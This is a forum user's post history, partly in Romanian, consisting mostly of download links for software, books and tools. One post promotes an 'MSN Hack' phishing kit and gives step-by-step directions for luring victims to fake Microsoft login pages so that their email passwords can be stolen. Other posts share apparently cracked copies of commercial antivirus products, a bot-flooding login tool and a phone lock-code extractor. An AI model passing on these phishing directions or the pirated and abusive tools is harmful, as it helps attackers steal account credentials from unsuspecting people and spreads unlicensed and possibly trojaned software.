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Everything posted by zbeng

  1. http://rapidshare.com/files/6595603/9786_GIFTS_SHOP_X-Mas.zip
  2. zbeng

    TM 10186

    Download Link: http://rapidshare.com/files/7281481/10186_sharefarm.net_.rar.html Password: sharefarm.net
  3. zbeng

    TM 7146

    Download Link: http://rapidshare.com/files/7319200/7146_sharefarm.net_.rar.html Password: sharefarm.net
  4. MSN PASSWORD HACKING (WORKS 100%) try it !!!! The fake pages are used to know the victim's password. You need to let the victim sign in at any of the fake pages to know the password of a victim, which will be displayed at MSN Hack all & PRO versions. The pages of the MSN Hack are fake. It means that they do not actually log in the victim but steal the victim's data and sends it through the MSN Hack versions. The pages of the fake pages/In-logs are taken from the original pages. For example, we have made a fake page/inlog of spaces.live.com which is named here as yourlivespace.uk.tt. It means that their pages are the same. In MSN Hack versions, there are the same URL's and fake pages but in the enhanced version of MSN Hack version, there are some codes along with the normal URL's of the fake pages.( URL means a link to a page or to a website. eg:www.messblack.com is the URL of the site 'messblack'). You need to give the victim an incentive or greed to make the victim interested to sign in at the fake pages. For example, we have made a page named: http://www.1000mbhotmail.uk.tt. It is clear from it's name. Of course, everyone wants to make his hotmail upto 1GB. So the victim gets interested and sign in at it but won't make his hotmail upto 1GB. It is up to you how you lure the victim to sign in at the fake pages. Here is the information of MSN Hack versions disrtributed at messblack and how to hack with them: MSN Hack ALL Edition: Introduction: It is the free version of hacking software which you can get from here. You need to be a member in order to use the MSN Hack ALL Edition. Here, you can get the URL's of the fake pages and a password screen which will display the victims e-mail address and password after the victim logs in at the fake pages. You can copy the URL's of the fake pages from the URL section in MSN Hack ALL Edition and paste them at the victims chat window, etc. to let them to login at the fake page. Hacking with MSN Hack ALL Edition: You need to follow the steps below to know how to hack a victim using MSN Hack ALL Edition: - Open the MSN Hack ALL Edition and login To know the password of the victim, use one of the four fake pages to fool your victim to login/sign in at them. Here is a short description of the fake inlogs: * yourlivespace.uk.tt It's page is same as at spaces.live.com. * yourlivepasport.uk.tt It's page is same as at login.live.com * newwebmessenger.uk.tt It's page is same as webmessenger.com * 1000mbhotmail.uk.tt It's page is same as at hotmail.com To let the victim login at the fake inlog, you need to assure the victim that the fake pages have some specialty in them even though their pages are same as other pages. The fake page will not actually login the victim, but, it will steal the data from the victim. It will show an error while the victim tries to login and send the e-mail and password of the victim to the MSN Hack ALL Edition. - Once the victim tries to login and complaints that it does not work, check up the MSN Hack ALL Edition password list, update it and the victim's user name and password will be displayed. to download the software go to http://www.messblack.com/index.php?page=getpro&mb_id=243618687598 and download the software for free!!!
  5. How to hide files in JPEG's Here is a link to a tutorial on hiding archived files in .jpg files. Cool stuff. http://www.thetechtray.net/articles/rar.php
  6. All you need is a DC60 USB Cable and this piece of software http://rapidshare.com/files/7286520/_phonelockcode.zip Executables are included for Mac and Win. This is the readme: 1) turn off phone 2) execute LockCode_USB.exe (double-click) 3) connect phone to PC via USB cable 4) read the output Well, mostly you are very fast in your actions but in case you have other things to do.. wink.gif A-step-by-step-how-to-run-a-commandline-app... 1. Extract the contents of the .zip-file to an easy to type folder, i.e. c:simple 2. Goto the windows Start-menu and select Run. 3. In the dialog that appeared, type cmd and choose Ok A box with (generally) a black background and grey letters appears. 4. Type c: and press Return or Enter 5. Type cd c:simple and press Return or Enter (ofcourse if you extracted the contents of the zip-file to another foldername, use that one instead) 6. Type lockcode_usb and press Return or Enter I take no responsabiluty, liability, try at own risk !!
  7. zbeng


    mie unu nu mi se pare ceva asa de interesant....deoarece a mia fost mai de mult ceva cu reputatie parca si nimik....da sa vedem ceo zice vrun admin;))
  8. veeeechi programelul...cea ce nu stiu e cat de bun este http://share.urbanfriends.us/savefile_php/uploads/c747b9e690.rar
  9. 5000 Bot Login, 16 Boot Options including IFrame and C++, Variable Botlist Delimiter, Adjustable Login Delay, Packet Delay, and Cycle Delay. Set Packet Amounts and Save Your Settings. DOWNLOAD http://share.urbanfriends.us/savefile_php/uploads/d475f52e45.zip
  10. http://rapidshare.com/files/6933703/MVE.rar pw:hazaa
  11. avast! 4 Professional Edition is a collection of high-end technologies that work in perfect synergy, having one common goal: to give you the top grade protection against computer viruses. It represents an ideal solution for any Windows-based workstation. avast! 4 Professional Edition is a complete ICSA certified antivirus software for your company. It obtained VB100% awards in 2002/4 Virus Bulletin comparative reviews. avast! scans for viruses, worms and Trojans: On Demand - with two User Interfaces, On Access, E-mail, during Boot Time, in File Explorer and Screen Saver. It maintains Virus Chest. Protects E-mail, HTTP, NNTP, ICQ, mIRC, Kazaa etc. True incremental updates based on iAVS technology updates twice a week virus definition file. avast! Home/Professional now fully supports the 64-bit Windows platform. Features: - Antivirus kernel - Simple User Interface - Enhanced User Interface - Resident protection - Script Blocker (Professional Edition only - P2P and IM Shields - Network Shield - Web Shield - Automatic updates - PUSH updates - Virus Chest - System integration - Command-line scanner - Integrated Virus Cleaner - Support for 64-bit Windows - Internationalization *** Antivirus Kernel New version of avast! antivirus kernel features outstanding detection abilities, together with high performance. You can expect 100% detection of In-the-Wild viruses (the ones what are really spreading amongst people) and very good detection of Trojan horses, all that with only a minimum number of false alarms. The kernel was certified by ICSA; it frequently takes part in the tests of Virus Bulletin magazine, often yielding the VB100 award. *** Simple User Interface Simple User Interface is used to start on-demand scanning, work with the results, change various options etc. Basic resident protection settings can be modified here. Simple User Interface is the main application of avast! 4 Home Edition. You can start additional avast! modules from here, such as the Virus Chest, Updater or Log Viewer. *** Enhanced User Interface Unlike the Simple User Interface, the scanning is performed by so called "tasks". First, you define a task, including various parameters - areas to scan, what to scan, how to scan, etc. Having the task, you can (possibly repeatedly) run it. Each task generates a list of results; you can work with them later. *** Resident protection Resident protection, i.e. the real-time protection of the computer, is one of the most important parts of an antivirus program today. avast! features a powerful resident module that is able to detect the virus before it has any chance to infect your computer. E-mail protection consists of two independent modules; first, there is a generic scanner working on the SMTP/POP3/IMAP4 protocol level. It is capable of protecting any existing e-mail client that uses these protocols. Second, there is a special plugin for MS Outlook only; it is completely transparent, requiring no special settings. New feature of version 4 is heuristic analysis of e-mail scanners. It is extremely useful in protecting against new, unknown viruses and worms that are not possible to detect by the usual means. The heuristic module performs a thorough investigation of every e-mail message and watches for suspicious signs that might announce virus presence. When the number of those signs exceeds the user-defined level, the message is considered dangerous and the user is warned. *** Script Blocker The resident protection of the Professional Edition includes an additional module, not contained in the Home Edition - Script Blocker. This module watches all the scripts being executed in the operating system (so called WSH scripts - Windows Scripting Host). It also scans all the scripts run as a part of a web page within your web browser (Internet Explorer, Netscape Navigator and Mozilla). *** Automatic updates Automatic updates are another key point in virus protection. Both the virus database and the program itself can be updated automatically. *** PUSH updates A special feature of the Professional Edition are PUSH updates. It is a dramatic change in the philosophy of updates. Usually, every installed program checks every now and then whether a new version is available. PUSH updates, however, are initialized by our server; they result in your computer quickly responding and performing the necessary update. The system is based on the SMTP protocol, i.e. on usual e-mail messages. The updates itself are controlled by the avast! resident e-mail providers (MS Outlook and Internet Mail). *** Virus Chest The main properties of the Virus Chest are complete isolation from the rest of the operating system (no outside process, i.e. no virus either, may access the files inside) and the fact that the files inside the Chest may not be run (i.e. there is no danger in storing viruses there). *** System integration avast! antivirus features outstanding integration into your system. The scanning can be started directly from Windows Explorer, by clicking a folder or a file with your right mouse button and selecting the corresponding choice from the menu. Another interesting feature is a special screen-saver that performs scanning for viruses during its run-time. avast! antivirus works together with your favorite screen-saver, so you don't have to change to anything you wouldn't like. Another new option is the boot-time scan (Windows NT/2000/XP/.NET only). It is important in the case that a virus is suspected to be active on your computer. The boot-time scan is performed before the virus may get activated, so the virus cannot influence the scanning in any way. *** Command-line scanner Experienced users may like another Professional Edition feature - command-line scanner. The scanning can be controlled by many arguments and switches; to use as a pipe filter, a special STDIN/STDOUT mode is available. The module is intended to be used in BATCH programs. Its output is the same as the output from the Enhanced User Interface tasks (including the report files). Changes in Version 4.7.892; September 25, 2006 : - avast is now finally compatible with Windows Vista RC1; also, the "remediations" in Vista Security Center are now functional - added CHM unpacker (and this time, as an extra benefit, it should work even in the boot-time scanner) - fixed a bug in the UPX unpacker - added a couple of new Win32 unpackers - added a workaround to problems with compatibility with Sunbelt Kerio Personal Firewall (remaints of menus on the screen + seldom hang of avast program on start) - no more attempts to delete files on read-only media - improved detection of ZoneAlarm Pro (to prevent unnecessary WebShield incompatibility warnings) - avast! screen-saver now uses better algorithm to remember last scan position - added Swedish and Slovenian language versions Homepage - http://www.iavs.net/eng/avast_4_professional.html Size: 11.4 MB http://rapidshare.com/files/7193382/setupengpro.exe
  12. zbeng


    zimi 3 motive ca sa punem aceasta sugestie in practica?
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  15. Integrating XML Web Services And .NET Remoting Make the jump to distributed application programming using the .NET Framework—and introduce a new level of performance, scalability, and security to your network and enterprise applications. Expert .NET developer Matthew MacDonald shares proven techniques for fully exploiting .NET Remoting, XML Web services, and other .NET technologies and integrating them into your real-world solutions. MacDonald digs into key .NET building blocks and architectural issues, explaining which features and designs will best serve your customized distributed application projects—and when to use them. Case studies with full code examples illustrate these practical techniques in action, as well as demonstrating their benefits and tradeoffs. Download http://depositfiles.com/files/437077
  16. Trend Micro Internet Security 2007 Trend Micro Internet Security 2007 and TrendSecure comprehensively safeguards your computers, your home networks and your personal identity. Email, shop, share pictures, bank, and instant message, confident that this award-winning security software helps prevent malicious attacks and reduces time-consuming interruptions. TrendSecure, a set of online services, provides extended protection, at home or on the go. TrendSecure ™ additional security software and online services: Transaction Guard™ protects your online transactions conducted at Internet Cafes or other public wireless hotspots. Remote File Lock™ safeguards your private files in case your laptop is lost or stolen. Trend Micro Mobile Security protects your cell phone against viruses and other threats. Antivirus Security Detects and removes viruses and the latest threats from your emails, Internet downloads, removable media and PCs. Automatic updates immunize your security system against the newest virus outbreaks. Spyware Protection Blocks and removes spyware, adware, grayware, and root kits, a new type of deep-hiding invader. Personal Firewall Intercepts hackers and network viruses trying to attack your computer and home network. Fraud Defense Protects you from on-line phishing scams designed to steal credit card and bank account numbers. Configures easily and notifies you of the latest Web-site risk. Wireless Network Monitoring Safeguards against unauthorized users invading your wireless home network. Home Network Control Manages, configures and updates security for every PC on your network, with an easy-to-use management console. Vulnerability Assessment PC-cillin performs regular scans of your computer, alerts you to operating system and browser vulnerabilities, and provides one-click access to Windows Update. Advanced Parental Controls Parental Controls allow you to manage your children’s internet activity by blocking Web sites and inappropriate content. Home Page: http://www.trendmicro.com/en/home/us/home.htm Download http://rapidshare.com/files/7114367/pccillin2007.rar
  17. # 1. Privire generala * 1.1 Ce inseamna securitate? * 1.2 Lucruri de baza * 1.3 Register Globals * 1.4 Filtrarea datelor o 1.4.1 Metoda "Dispatch" o 1.4.2 Metoda "Include" o 1.4.3 Exemple de filtrare o 1.4.4 Conventii cu privire la numirea variabilelor o 1.4.5 Timing * 1.5 Error Reporting # 2. Procesarea formurilor * 2.1 Trimiteri inselatoare * 2.2 HTTP Request-uri inselatoare * 2.3 Cross-Site Scripting * 2.4 Falsificari Cross-Site Request # 3. Baze de date si SQL * 3.1 Credentiale de acces expuse * 3.2 SQL Injection # 4. Sesiuni * 4.1 Session Fixation * 4.2 Deturnarea Sesiunii # 5. Shared Hosts * 5.1 Exposed Session Data * 5.2 Citirea Filesystem-ului # 6. Despre ghidul il vedeti aici http://pozezml.evonet.ro/
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